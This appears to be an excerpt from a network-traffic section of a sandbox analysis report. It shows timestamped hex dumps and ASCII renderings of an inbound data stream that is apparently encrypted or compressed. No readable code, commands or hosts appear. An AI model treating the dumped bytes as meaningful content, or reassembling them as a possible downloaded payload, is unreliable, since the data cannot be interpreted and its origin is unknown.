                                                                                                                                                                                                    2022-01-14 03:59:52 UTC6846INData Raw: db 3b de e5 bb c1 b6 e2 06 cf 03 77 39 aa 87 92 16 1c a8 55 f1 60 db 79 d7 8d 70 27 24 2b e8 25 6f 8a b8 18 72 69 48 54 46 17 cb d4 fd d9 16 b8 97 b3 89 7d 59 18 38 91 46 06 8d 4f 13 75 e0 94 ab 5e 57 53 90 68 8d c7 be a3 6f 2d ad 94 d5 07 55 60 17 ac d9 d9 18 6c c8 8c b3 ef d8 ad 20 cf 42 6f 65 ec b9 e5 67 47 4a 8a d1 da d9 ed 5a e3 c1 0e 34 c6 5d eb b2 c2 16 96 fd 00 5d d0 79 3c d3 6c 77 6e 54 a0 c8 f6 38 25 eb c1 5d 64 45 8d 23 58 a8 f6 d8 f4 29 89 16 b1 26 47 15 69 5b cc 79 ad 5a f8 e1 77 8c ca 34 96 5a 3e 8d 04 f5 41 48 48 66 fa 6f 81 c6 97 e5 82 47 e2 ae 22 06 23 77 9e 35 c4 1c fa 33 69 90 65 91 f0 d1 6c f9 6a 0f af 26 1f 3b d8 4d cb 80 64 ab 9e 6d b5 ae f8 59 43 0f 14 71 70 65 1d 3c 0a 03 d9 45 05 f8 2d 80 42 44 89 06 50 6f ab a8 ff b8 b8 23 98 3a
                                                                                                                                                                                                    Data Ascii: ;w9U`yp'$+%oriHTF}Y8FOu^WSho-U`l BoegGJZ4]]y<lwnT8%]dE#X)&Gi[yZw4Z>AHHfoG"#w53ielj&;MdmYCqpe<E-BDPo#:
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC6862INData Raw: a5 d5 2b e0 c3 c9 eb 7f e2 e1 dc c3 11 2f 2c 17 ef 9f 2b a4 d8 0e 5f 4f b6 88 30 a7 2f cd 57 62 4a 34 8d 24 cd 77 f9 47 fc 67 f4 58 e1 58 2a b8 0e 7b f9 42 f1 c5 aa cc 23 d9 ac 65 29 60 2a c3 36 08 11 b5 98 1a d0 03 d0 1e b6 ae 97 51 0a 40 ff 05 f3 00 00 3c 8a 3c 5d f4 67 35 4c ea a2 dd 82 d7 c6 6d 63 58 be 57 58 c2 9b 36 37 21 f2 57 d5 ed e3 32 5a fa 24 66 32 44 bb f4 85 a8 54 08 6c 86 4d 74 a1 b6 a6 a2 d8 b2 9b 30 60 0e bd ca 15 9b b3 37 6c c3 f9 4d fc 0e f2 cc 0a 04 15 67 4b a7 8a 9c 74 6d ff 1e 9a e2 d6 dc 81 a2 47 59 49 b5 df ca 02 5b 71 e1 9a ce 06 4f b4 0c 73 b5 a3 3c e6 7a 9b 56 52 61 ce 2e fb 89 73 bc 03 67 85 4e b8 0e 29 9b f0 e6 d7 d2 1f 71 0f 07 d2 d8 d5 56 20 6c 54 7f 5c 44 d1 cf 26 6d 60 e8 7e 14 93 0e ce e2 94 92 39 96 81 3a 13 32 01 bc 88
                                                                                                                                                                                                    Data Ascii: +/,+_O0/WbJ4$wGgXX*{B#e)`*6Q@<<]g5LmcXWX67!W2Z$f2DTlMt0`7lMgKtmGYI[qOs<zVRa.sgN)qV lT\D&m`~9:2
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC6878INData Raw: df 9e c1 d9 6f c1 e6 62 9b ba ef 35 46 04 f2 79 15 85 55 46 6b 88 ac 2d 99 f5 ff 46 8a 3e 1f 77 85 52 c1 a2 26 98 99 13 91 f2 81 44 0a 7d fb f9 de ee 50 84 c6 10 d5 47 a9 9e ef 85 16 a5 64 67 12 d0 37 60 98 36 b3 fb 03 af 9a ad 07 45 4a 92 c5 20 4a d5 f0 d6 67 70 b5 b7 ef 33 38 e4 fe ad 8c 34 12 17 10 99 cc 86 8b 7f a2 70 70 94 f0 7b ef fb 41 6d ed 4d 52 a5 5f 22 32 9a cd 07 81 e6 bc 70 24 fe c4 d9 da 9f 14 78 fe 5e 46 eb 01 6b 1e 90 d2 99 c5 6c a6 36 d7 ce c4 ad 50 ba 35 12 c1 66 08 78 d0 19 43 be 16 99 3b c5 d6 ba 36 ab 35 e0 d5 5e 7b 26 d7 fe e8 c5 68 41 24 01 3e 0d cd 97 60 7a 3c b4 39 d3 6a dd 10 c3 6c f3 6a 92 50 87 a7 ec 93 77 f3 f8 e9 d2 16 69 8a 7d 9f e4 d9 4e 3a 3f f2 0a f6 a9 17 d5 77 1e 50 35 e7 05 d7 92 31 cb ca f3 ba 31 0e a5 2f e7 ed d8 e8
                                                                                                                                                                                                    Data Ascii: ob5FyUFk-F>wR&D}PGdg7`6EJ Jgp384pp{AmMR_"2p$x^Fkl6P5fxC;65^{&hA$>`z<9jljPwi}N:?wP511/
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC6894INData Raw: a0 46 ec d3 b9 e0 69 7b 16 ca da 6d ec 0e 57 0a 50 94 61 4f fa 71 81 28 48 a5 92 bf c7 2c 73 8e 3f 5d 29 51 0d 04 4f e8 38 69 11 52 02 a6 a1 72 ef ac 44 c4 bf c4 65 7b ff ea c0 55 4c de 54 df c7 33 33 16 a6 33 6b 31 4a ee 59 31 40 eb 46 1d 6f 30 23 4b 2b ca f5 4e 35 ba 70 d2 b0 27 26 a2 66 7f 9b ac 95 cb e9 5f e5 28 92 f2 44 69 d7 2d e9 83 51 e9 17 18 63 c9 99 67 35 58 a8 5e d3 a7 55 32 69 c7 c7 04 1b 3d fa b9 b5 1f f0 71 81 fa 90 80 f6 4c 0b 51 59 3e 68 e2 c2 b6 56 d3 69 54 b4 94 99 79 bf b9 a8 83 9c 4e 0f 51 da bb 5c fa 87 c9 ba 21 64 43 de d5 f5 77 f0 58 d7 35 e7 6d e9 e3 62 76 e8 28 1e 79 27 b2 a7 3f 21 12 2d d2 a8 e1 4a 82 2b 1c 35 c0 53 a6 d7 f0 d1 47 9e 46 8f 86 56 af 8d f9 20 cd b1 ba 58 8b 9b b5 29 eb de 7e ef 81 bf a6 23 e3 ca 49 06 ff e8 96 d7
                                                                                                                                                                                                    Data Ascii: Fi{mWPaOq(H,s?])QO8iRrDe{ULT333k1JY1@Fo0#K+N5p'&f_(Di-Qcg5X^U2i=qLQY>hViTyNQ\!dCwX5mbv(y'?!-J+5SGFV X)~#I
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC6910INData Raw: 0f e0 d3 46 b5 9a 9b 99 d3 28 82 59 27 56 f5 81 66 06 b3 24 b3 84 90 5a e0 d7 52 ed 83 4a 90 11 8d d2 96 71 54 0e c8 5f c3 54 53 a4 22 13 99 72 3c 51 44 00 d4 1c 24 66 a0 74 0a d4 fc 88 7a fc 41 44 7a 3a df 74 e6 2d c4 c3 ec 88 00 c2 40 06 62 9b 27 02 d9 7a 67 12 97 c5 cd f1 84 fc 90 3a 0d 8a 84 93 3f c2 53 26 fc 7f f1 28 5b 9e 43 2f 0e 77 4b 58 99 e4 7f 46 3c 28 57 cb a0 a6 a2 b1 9a 03 15 25 71 a4 77 88 31 18 fd 42 ec fb de aa 46 3d 98 ff 64 9f cb 07 7e 5c 7c c9 1a 04 b5 71 8b f0 bb c5 28 5b 31 99 db e3 06 7c c3 ad 80 87 be e6 55 33 57 41 f2 ac b3 d1 c3 cb 6d 80 32 be cf f7 11 8d e8 4d bd cc e6 e6 d1 33 db 4e 1f bc 0e 60 12 74 86 cb 7e c9 d3 f6 b0 cd 65 4d c6 af 77 d8 eb ce a9 09 a9 72 d5 08 61 ab 3a 8d 14 a4 89 41 fa f7 47 6d b7 e6 2d 2f 47 eb c6 30 55
                                                                                                                                                                                                    Data Ascii: F(Y'Vf$ZRJqT_TS"r<QD$ftzADz:t-@b'zg:?S&([C/wKXF<(W%qw1BF=d~\|q([1|U3WAm2M3N`t~eMwra:AGm-/G0U
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC6926INData Raw: 4e f3 3f b6 2c e6 49 bf 38 08 ee 58 a2 25 04 73 6f 79 29 4a be 8e a3 e9 7f 7f 7f e8 58 55 d2 0a 66 d4 c8 b4 6d 59 a9 ef 26 97 e8 63 72 6d 40 45 10 52 7c 2c 35 be ba 8b 0e 50 bd d6 57 2a 81 62 2d e4 d7 40 2b c1 87 60 8a 9b e2 7f 36 b0 ea 26 c1 77 be 45 d8 62 9b 6d 47 02 84 cf 64 f8 ac 25 da 9d df 12 3a aa 6f 08 8a 79 10 3b 3f 4d 4f 75 69 54 88 a8 ba 30 9d e7 87 ce 52 b9 87 22 8d 9a c4 1d a0 91 cb 18 2c 34 94 e1 fe 35 e0 47 8c f8 fc cb 85 d7 8e 22 42 0d 8b d2 b3 c6 6e 85 c8 7e 45 4d 5a ad 76 41 70 99 e4 17 35 97 1a cc b1 b7 62 5e 75 45 e6 43 52 84 67 3f da e3 70 68 0d c1 96 b4 d7 3a 91 3d e7 b8 16 7d a8 43 c4 ec 91 1d c2 96 9f 29 46 ab bf eb 8c a0 35 53 f3 5e 8c 53 a8 01 a9 e0 63 7a 41 f7 90 40 54 47 b1 f8 8d 67 5f 67 4d f8 aa 0a bb 10 1f 9a a1 b1 9c 3f 49
                                                                                                                                                                                                    Data Ascii: N?,I8X%soy)JXUfmY&crm@ER|,5PW*b-@+`6&wEbmGd%:oy;?MOuiT0R",45G"Bn~EMZvAp5b^uECRg?ph:=}C)F5S^SczA@TGg_gM?I
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC6942INData Raw: 82 d1 11 50 5c 2d e1 f0 48 eb 31 48 8f 35 3c 97 03 71 60 20 79 8e 88 13 80 84 21 c1 18 5e 61 6f 93 9c 39 02 ba 35 82 4c bb ed 57 59 7d 87 83 eb 0c d4 84 ab ff 77 7b e1 00 8d d9 58 e8 c3 65 22 ef 47 c7 dc 43 1f 7b 4d 08 ec d4 6d c7 d9 2d 8e ca 22 47 a4 6b f0 5c 3b 04 02 27 e8 14 13 c5 84 06 c9 d0 7f 5b 1d 35 56 f7 ac 88 38 44 98 3c 9c 6f 25 13 c3 1d 1d 7b 8f ce ea 75 bf 57 43 93 a5 53 df 53 72 f9 0c 7f 1a c7 2d fc 6a 04 82 74 4c 76 64 c6 8e 13 69 7f fb 43 04 b1 25 3f 41 1f 70 7b f1 38 cd 8a ba f9 de e2 e3 1a 02 96 0d 7b 0b 94 11 29 75 3b c0 c6 4a 1c b6 16 3a 09 00 0b 3c 05 f1 b8 d6 cb 59 f5 aa 23 7f 24 03 c5 ba 39 4e 28 dd 16 d9 a8 47 7f c2 61 82 dd bd 08 52 ca a7 9d e4 49 7b ca 0b 73 69 e9 1d 57 96 5d ec ba f4 13 fd 86 8d d2 d2 b8 07 36 e9 ae f1 9e 0f 9b
                                                                                                                                                                                                    Data Ascii: P\-H1H5<q` y!^ao95LWY}w{Xe"GC{Mm-"Gk\;'[5V8D<o%{uWCSSr-jtLvdiC%?Ap{8{)u;J:<Y#$9N(GaRI{siW]6
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC6958INData Raw: 41 76 ba 5f 80 31 5b 5d 66 6d 3a a4 b9 e8 51 bf f9 a9 7b ce 67 98 33 64 38 d8 1a 3d d7 eb 55 90 3e 09 af 68 5a 98 62 17 a1 a4 61 8d 28 2a 34 a3 f3 33 0c 7c 6a 90 d1 ed a1 1d 3d f2 43 12 8e 14 3a 19 9a e1 0d 5a 5c ac 8d 89 52 8e 37 20 e7 54 7f 76 1f 0e 71 25 96 6f 6c 95 90 30 0b 04 57 1b 2f bf c4 73 b3 7f 2b 87 3c 46 fa 84 63 80 13 13 a6 64 34 df aa 7b e1 35 19 2c 72 a2 8f d0 e1 a8 a8 a5 df 22 b3 ca 59 c8 99 b4 49 a6 09 b2 be f6 81 0d 49 7c c1 26 49 6f 9e 1e 00 9e 95 70 e1 1a 5a 82 cd 43 be 22 90 4b 83 4f 92 e5 e1 83 e1 8e 8e b1 ef ab 4a f5 8d 3e 7b b8 e8 d7 0c a5 cb 59 ba 5a 04 05 19 e1 ec 31 9c 2b 23 2d 9c 1a 67 3c d2 ec 21 d6 3b 8e da 29 a1 9a e7 c5 3c 4a f6 31 01 c1 2d ae 4f 47 a6 15 2a 3c e9 61 53 56 30 81 a9 be 9a 69 97 6c f0 70 04 06 eb 88 61 43 be
                                                                                                                                                                                                    Data Ascii: Av_1[]fm:Q{g3d8=U>hZba(*43|j=C:Z\R7 Tvq%ol0W/s+<Fcd4{5,r"YII|&IopZC"KOJ>{YZ1+#-g<!;)<J1-OG*<aSV0ilpaC
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC6974INData Raw: d1 8b 07 a3 58 2c 12 0d 44 ea 1c fe 60 a6 2b 90 b1 7c 54 a3 c0 27 67 7d f7 d8 91 ae 2c 74 8f 58 59 ed b4 e6 dc 97 cd 26 cb 59 87 cb 64 b0 b2 32 3f 50 66 db 70 35 78 90 b8 bf ca db 50 c3 46 61 39 fe 27 b9 28 b1 35 69 c1 d8 15 9d 5a 46 ff 04 83 8a c7 6a 8a 80 9c 09 60 5e 0e 0b 1c d9 a4 f2 5b 4e 16 88 5a a6 32 e4 10 bb 7f fb fd 16 d1 c0 cc c7 1b eb 12 ea 7b d3 ac 71 0a 17 75 f8 44 ab 97 ca a2 c8 74 50 5d b0 5d 71 2f cb 51 4c a6 ce 36 ca 39 f7 7c 2d d0 3d 58 d1 45 73 2c 5a 3f 35 2b ca 7b 6f e9 52 36 cb 98 ae 3a 2d 68 dd a0 ff fe bc a2 bf 9a 79 6b 6c 48 d7 e1 c9 c2 89 32 70 29 8f 86 2b ca f4 88 d8 20 ff 43 b5 1b b9 4b 69 8e b5 ff 5e 37 0b c9 f8 81 24 02 72 4b 95 1a 33 dc cc 82 eb 01 b0 0e 05 4c cc 73 c7 57 ea 53 71 27 0c 5a c7 b4 6c d0 58 c6 be 61 27 f9 1e 38
                                                                                                                                                                                                    Data Ascii: X,D`+|T'g},tXY&Yd2?Pfp5xPFa9'(5iZFj`^[NZ2{quDtP]]q/QL69|-=XEs,Z?5+{oR6:-hyklH2p)+ CKi^7$rK3LsWSq'ZlXa'8
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC6990INData Raw: 75 23 8a 8d ff 6c 8b 30 f8 9e 50 45 8e cd 5e 81 32 14 bb 56 94 7e 80 58 a0 f2 4d 47 32 d5 3a bb c9 02 ce 7b 38 d5 b3 9c 30 ad fa 10 0d dd b7 48 82 97 97 f1 ef 75 4b b0 70 ab 07 b1 90 09 b8 37 ce 18 4f cf c9 a3 98 fa 1c 24 d4 af d7 e9 b6 5d be 32 89 33 cd 91 40 95 95 a7 ab 2a 77 2c 03 0d 83 aa 4b 80 03 50 66 02 a8 07 ea 94 6b 2b ea 8b 4c 18 2a 6a 54 a1 64 c3 35 d8 3d 57 9d 0e b4 51 95 9f 3e 1f d9 18 f1 fb e4 aa 7d dc cd 5c 34 d0 21 92 44 ae 17 9e 42 fc 38 dd f8 62 59 1b f1 de 5d a0 f9 e9 00 70 81 1e 1f ef 02 97 fa c1 ac 3a fb ff 49 b0 eb 2c eb f6 80 19 ed dd d9 e1 5e d0 6f 8e 9a 81 b2 57 0f d6 a4 9c b0 d0 ed 15 dc f7 9b da d0 51 d4 8e 1b cf 65 10 fd eb cf 55 c4 d7 2e 71 09 bd 13 8a b7 d4 cf 4c b7 67 b4 e8 ae a2 b3 11 5f 86 4a 1c 98 f1 90 5e 37 43 f5 f5 55
                                                                                                                                                                                                    Data Ascii: u#l0PE^2V~XMG2:{80HuKp7O$]23@*w,KPfk+L*jTd5=WQ>}\4!DB8bY]p:I,^oWQeU.qLg_J^7CU
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC7006INData Raw: 6e 23 4d 7d 07 45 64 83 4b b4 63 06 0f 77 24 f1 11 77 66 6f 74 ff d8 e3 91 78 01 8a 3f 96 f2 81 8b ff b4 a6 9a 9c 2c af d7 0a b7 74 15 d7 c3 5e 61 1c 9e e4 22 da 88 35 56 03 61 90 a5 de f5 61 20 7f 62 eb 71 cc b2 df 46 c6 05 5c 88 64 05 fb 2a ba 43 2f 8f 9c 28 aa a2 7c a7 62 3d f7 94 c4 da 3e f5 06 30 ef 28 16 72 08 12 a0 42 c1 c7 5d 1d f1 06 7a 07 be 3e 69 9d e9 25 46 64 5c e7 0f 42 a1 bb e1 6f b2 5b d7 a8 9b 7d 6b 08 90 ca 40 d5 d6 58 56 9a a6 6e 88 31 cd b3 b7 e9 2c e6 82 b4 dd ac c7 9e 81 33 14 8c 00 b3 92 c5 c3 93 ff 27 d6 5a f4 0e 38 ac c5 32 f3 c8 95 a5 5e 3f 40 0c 60 f5 6d a4 33 68 21 36 d4 9a 15 f3 03 72 70 47 87 4d 85 ac 71 6f 78 1a 34 3d 51 f3 b3 c6 8a a0 dc 6f e8 23 b2 c8 f9 69 5b 33 f7 67 82 d9 88 48 7a 6f 7e b5 c6 a5 96 fe 03 43 eb 73 dc ca
                                                                                                                                                                                                    Data Ascii: n#M}EdKcw$wfotx?,t^a"5Vaa bqF\d*C/(|b=>0(rB]z>i%Fd\Bo[}k@XVn1,3'Z82^?@`m3h!6rpGMqox4=Qo#i[3gHzo~Cs
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC7022INData Raw: d1 ec 14 cb f1 92 8d 61 0e 2f f5 ca 5a 63 a5 ba 28 b5 ae b1 48 b7 24 1b c3 76 d6 11 65 bc bb 5d 32 49 bb ba ba 74 ad 67 91 cc 3c ae 4b 25 0f 29 9d 39 12 75 de ec f3 02 eb 71 07 b6 bb 44 8e 4b 0c 48 c8 50 1d ae cf 70 9b f9 30 3a a9 f6 e3 53 75 3f 22 29 12 b4 3b 38 a8 0d dd 40 28 54 9b 7a 23 db 1b bf fc da 69 a9 dc 75 09 f9 43 9e 91 a9 b1 1f e3 2f a9 f4 21 5c 3d f3 b6 f7 d8 3f df 68 a1 da 3c c1 c0 08 9e 99 ed fa a0 73 c3 94 96 f3 d1 0b 86 d5 5a 25 4e e6 98 32 1c 0b a3 04 d0 93 f3 6c 37 9c 0f 5c 9c 48 25 2c 74 03 71 02 92 1b 37 36 a0 ba 90 09 75 1f 20 5d 90 1a 0c 42 90 94 3c ea ea 02 5e d4 8d d6 7c 85 91 dd 0c d9 45 e5 a3 fa 98 e3 75 16 8e 7f f5 0d 70 6e 48 a4 31 e0 60 ea cb d2 dc fa 39 30 23 27 eb 01 f9 68 e1 b0 18 95 8b ee 8c e7 bc b1 ec ae 3f 4e 80 30 3c
                                                                                                                                                                                                    Data Ascii: a/Zc(H$ve]2Itg<K%)9uqDKHPp0:Su?");8@(Tz#iuC/!\=?h<sZ%N2l7\H%,tq76u ]B<^|EupnH1`90#'h?N0<
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC7038INData Raw: 21 9e cd 9b a0 28 4b 17 c4 c6 c8 ee df c4 1d f2 22 9f d5 3c 8a be ea 08 c3 49 98 4b 7f ef 5d cf 7d 3e b0 01 82 5e 10 ce 55 10 6e 64 09 ef a7 02 74 b7 d5 1a 36 b3 41 aa f3 0d 31 fe fc ee cf c1 b6 af b9 91 8e 3e 26 41 59 76 3d b7 4a 9e db 5d c2 f5 93 bc aa 9f 83 44 ac 0a c5 a1 25 2a 46 37 8d d6 b6 3f be 05 3d 55 35 c0 67 20 41 ea 90 10 ba f2 bb 44 79 fe 1b 9a 4a ef 3f 05 1c e8 70 9b 49 a4 4c 83 4c 85 45 36 f9 28 57 8c 11 a0 23 c6 83 54 f5 2d 80 9f 22 d5 ca 22 51 a2 eb db fb 58 2b 7f 63 0c 4c 50 af 92 9e 31 e6 2c da d9 f1 af e0 35 a8 3d 44 0d 8c 76 66 6d ca 90 24 45 f7 35 b2 a3 ac 0f a7 3e 92 38 2d df 78 ca a0 75 27 78 a0 f6 33 7d b3 c5 bc 98 2e 51 48 9b 07 60 56 5e c7 f1 9b ec 61 a3 5c cc f0 b7 87 d8 28 e4 41 1a 45 f3 da c0 e4 8a ee 94 80 94 7e e9 a3 14 bd
                                                                                                                                                                                                    Data Ascii: !(K"<IK]}>^Undt6A1>&AYv=J]D%*F7?=U5g ADyJ?pILLE6(W#T-""QX+cLP1,5=Dvfm$E5>8-xu'x3}.QH`V^a\(AE~
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC7054INData Raw: ce 6f cb 6a a5 d5 f4 87 69 e3 2e 57 6f 59 9a 08 39 71 20 ac 40 24 e7 5e c4 92 89 f8 dc 73 ed b5 9c 52 f9 3f 7d f9 09 67 9e 37 89 53 e1 07 dc 77 be d8 07 bd 27 64 61 7b be 22 f2 f2 43 2e c4 22 94 f7 9e 1d c8 0b 8f 09 a7 9d 0e c4 33 51 4f 30 13 b1 8d 16 14 47 52 16 ed 5d 6c ea 17 79 49 96 56 f6 9c 32 c7 e9 83 b4 65 94 18 11 7b 23 7f 2d 99 76 cb 34 1a bc c1 74 cd b6 ea a6 9f 70 6f 14 2b 8a 39 7d 11 1f cf 6e 20 a9 ed 61 c6 14 5c dd 86 f4 55 cc 68 b3 52 18 00 fb f2 e7 26 ab 97 0c 29 ca 7a 82 ca 2c 00 d6 c3 18 c2 7e 61 f8 85 9a 42 d5 27 98 2c 55 7e 41 45 ee 4c 93 7a 71 ae bb 06 c9 4b b4 1c 4a 5a 14 3a 08 98 fc ea 0c c1 6d d5 5f 52 71 44 c5 fa 92 84 4a 07 57 ce 21 ba 04 82 7d 52 ad 53 80 20 e9 22 a6 4d 8a 67 45 11 46 d3 66 6c ca c2 ca 5c b2 6c 0b 0e 55 e8 6d ba
                                                                                                                                                                                                    Data Ascii: oji.WoY9q @$^sR?}g7Sw'da{"C."3QO0GR]lyIV2e{#-v4tpo+9}n a\UhR&)z,~aB',U~AELzqKJZ:m_RqDJW!}RS "MgEFfl\lUm
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC7070INData Raw: 86 8f bb 4d 1c 82 4d 5d f6 cb 85 1c ec ae 8e 17 a5 fc ee 28 29 3b 22 e4 66 b3 c9 87 42 7a 9a 3c 1c e0 8d 4b 86 ac c1 d9 7b 65 30 10 a5 a0 a6 f8 be 0d 37 17 43 7e db 9a 6a 6a a2 36 b3 51 ab 74 d7 c7 2e 28 28 df 02 33 46 5b d8 43 d6 b9 58 6e 00 8a fd a9 50 7b e9 16 d3 21 3d 33 6e 84 74 f5 04 df 5e f6 e1 43 26 56 6c a3 6c f2 e7 25 e9 95 c8 4f 36 e1 80 18 57 02 9f 0f e7 e4 e7 d2 9c a6 6f f1 ac 09 c0 d2 23 a9 87 ba 85 5d ea c9 5b 5a 76 f9 8e af e5 1b ee 08 f9 7d e3 b3 7e a7 9a 17 09 04 d5 53 cf 22 24 16 87 2d ea a4 e7 19 50 25 d4 69 22 f2 d3 62 5d b7 a4 0f e8 70 35 33 a9 1a fc 00 0d b1 1d d9 8a 10 5e 25 53 1f b0 f2 2b 1b 76 17 f2 6e 9b 64 77 f3 10 1e b9 ec 95 dc 90 b1 ae fa cc d1 52 3b de 44 de 38 c1 0c 16 4e 5b 45 94 37 e5 42 c6 e8 9d be b3 f5 77 89 de 67 7b
                                                                                                                                                                                                    Data Ascii: MM]();"fBz<K{e07C~jj6Qt.((3F[CXnP{!=3nt^C&Vll%O6Wo#][Zv}~S"$-P%i"b]p53^%S+vndwR;D8N[E7Bwg{
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC7086INData Raw: 44 e7 67 e1 01 fa f7 a1 f5 88 40 b4 53 86 6c 7f 27 a2 75 eb 4c 58 aa 99 64 2d e1 99 ad 18 da 8a a5 a2 58 4c 98 06 dd 5a 6e b8 8c 11 aa 77 56 24 4f b2 88 27 b4 b8 9c dd d8 10 f5 d2 b7 85 26 82 73 4b 47 44 9c ae 48 a8 22 cb 38 05 d2 94 f0 54 22 9e b1 ef 81 1d 09 ba 70 4c d0 a5 4c 19 a3 19 92 25 c8 dc 2c c0 4b 59 a4 44 4b 5c d0 07 1c 85 97 de a2 33 d1 9a 0b 7d fd 50 8c 0a 53 c6 f8 36 f5 4a 87 ba ab 1a 7f 34 8b 3f ec 17 c6 45 a7 da 52 23 4d 7b d1 f0 e7 01 1e 32 26 1a 13 3e e9 d3 c1 aa b7 fd 67 6b 02 19 77 e1 44 7b 59 3e e2 a5 57 e3 c1 60 31 26 2e a3 6f 11 5e 5c 1f 7d 3c 3d 7c 5d 7c 46 6f a3 a1 0d 6a 75 12 f5 7a c7 c9 80 71 db 1d d4 f5 24 e9 24 e8 52 f4 38 5d e7 03 8c 65 9a 72 7e 31 e2 01 ec 2a 29 d3 88 18 cf 80 08 3b bd ef 9a bd 8d 35 05 c1 64 c2 37 05 c6 94
                                                                                                                                                                                                    Data Ascii: Dg@Sl'uLXd-XLZnwV$O'&sKGDH"8T"pLL%,KYDK\3}PS6J4?ER#M{2&>gkwD{Y>W`1&.o^\}<=|]|Fojuzq$$R8]er~1*);5d7
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC7102INData Raw: 76 90 af 25 ac fe 6f 04 ff b4 3e 0c 64 39 90 c6 1c e7 f3 a9 24 58 43 87 4a 58 ce 33 ba 75 6b 0e 19 e6 09 80 08 58 ee e7 c9 94 4b a5 c5 89 71 a2 ab 4a 6d 88 95 4e b5 9f 83 dd 76 dc 7e 76 95 3f 0a 4b 80 d8 46 0e 15 71 e2 45 12 1d 05 69 d7 66 0a df a8 5a 2e 4e 30 2a 9c 30 2d b5 c2 d7 9e 70 b5 50 70 26 b6 5c f4 68 3b b9 55 c0 42 06 95 ba 76 18 ee 3b 3f f0 8a be 3e 65 d0 1d b4 62 86 d1 f8 84 25 b4 5c 8f 8b a7 22 bb 5d 06 41 b2 b1 42 4a 33 e7 02 dc 22 96 2c 20 ed ef 67 e0 fa 0a 0c 61 68 c0 8b 00 9f a3 9f 3d be 88 75 a4 8e cb bc b4 23 7e c8 eb db 27 8d bf 51 6f 11 ed bb e1 73 b5 c0 9f 71 a4 87 1c da 6a 7b 37 f8 bd 06 d9 10 f3 85 6c d9 96 15 85 b2 f3 30 bf 14 da 85 41 40 37 2d 8f 99 40 62 5d 05 54 da cf e3 55 71 d8 b6 41 57 f2 3d 9a 91 61 f0 3c bf 73 b1 70 d0 c0
                                                                                                                                                                                                    Data Ascii: v%o>d9$XCJX3ukXKqJmNv~v?KFqEifZ.N0*0-pPp&\h;UBv;?>eb%\"]ABJ3", gah=u#~'Qosqj{7l0A@7-@b]TUqAW=a<sp
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC7118INData Raw: d5 76 87 9a 44 01 1c 5b c3 30 db 1a ae 5e eb 09 cd 70 2e 90 5d ff 13 ad 2c 06 74 d6 54 92 71 52 1c d8 36 08 b6 a1 bf 6d c6 24 a5 0f 67 99 60 37 32 08 6b 4c 55 53 ca c4 91 d1 0d b5 17 75 66 bd ca bc ad 8f fa 06 f0 8c 2e 66 a4 00 50 d1 79 97 03 06 bb a8 4e 38 a0 40 5e 2f c7 b5 5f 50 92 cc eb ae 3c f7 10 fa 6d b8 7d 17 4b 42 6f 37 b1 21 25 0b a8 f2 3b 1e 8b a0 98 79 9d a6 52 d0 76 00 e8 d7 eb 31 0e d1 2c 34 c5 49 ef b2 0f 8d b5 76 2f df c3 b0 12 ba a2 fb 44 ac e7 59 99 0b c6 1c bd 7a 65 8a 4f e2 68 2b c7 9d 3b c3 53 cb d6 e4 8c 67 13 e6 f2 91 97 b7 66 11 63 8a db 2b c3 78 80 0a 60 cd 57 f8 94 c5 9f 26 f3 c0 26 d3 58 09 1f 3e ac 86 e2 4f c5 e8 d1 8a 79 90 f4 be f5 3c 87 c7 c0 b3 23 62 62 0c 2c 7b d2 0d d0 44 d4 ee 3d c0 60 0d 6c 74 19 dc de 8b 2a 8c 1d 09 37
                                                                                                                                                                                                    Data Ascii: vD[0^p.],tTqR6m$g`72kLUSuf.fPyN8@^/_P<m}KBo7!%;yRv1,4Iv/DYzeOh+;Sgfc+x`W&&X>Oy<#bb,{D=`lt*7
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC7134INData Raw: 30 4b 8c 42 68 36 36 31 4d 4d 30 50 77 73 6d 32 66 37 df 30 31 49 4a 62 71 56 a3 5a 31 70 3c 32 71 46 54 00 69 61 78 6f 77 54 7d 70 7a 64 9a 6f 4f 36 99 6e 71 5a 52 50 66 6b 49 75 72 61 43 70 4c 61 65 6b 35 30 69 31 33 4f 65 63 71 42 74 76 49 44 76 72 6a 66 2b 7b 4a 41 08 37 35 31 4f 4d 70 41 04 46 6f 32 6c 3d 76 2f 3b c4 4c 61 71 57 62 89 34 71 32 36 59 7f 54 00 63 12 40 6f 77 5e 64 4b 7a 64 5e 67 48 1e 5a 6d 71 50 75 57 60 66 94 5e 73 61 43 72 64 66 63 6b 33 3c 6b 46 dd 4f 6e 61 62 46 66 72 55 c9 4b 72 6a 66 15 9b 9a 41 68 32 1d 08 4d 4d 7a 23 4d 72 6f 38 09 c6 74 30 37 6f 65 72 74 6e 9b 59 31 70 41 40 70 46 52 13 6f 70 7c 7e 73 45 49 66 15 97 54 6c 49 59 5b 6d 71 50 37 3d 67 6b 4f 64 74 70 47 61 49 78 0c 98 35 30 6a 5a 0e 4f 6e 6d 1e 2d 76 76 4f 55 72
                                                                                                                                                                                                    Data Ascii: 0KBh661MM0Pwsm2f701IJbqVZ1p<2qFTiaxowT}pzdoO6nqZRPfkIuraCpLaek50i13OecqBtvIDvrjf+{JA751OMpAFo2l=v/;LaqWb4q26YTc@ow^dKzd^gHZmqPuW`f^saCrdfck3<kFOnabFfrUKrjfAh2MMz#Mro8t07oertnY1pA@pFRop|~sEIfTlIY[mqP7=gkOdtpGaIx50jZOnm-vvOUr
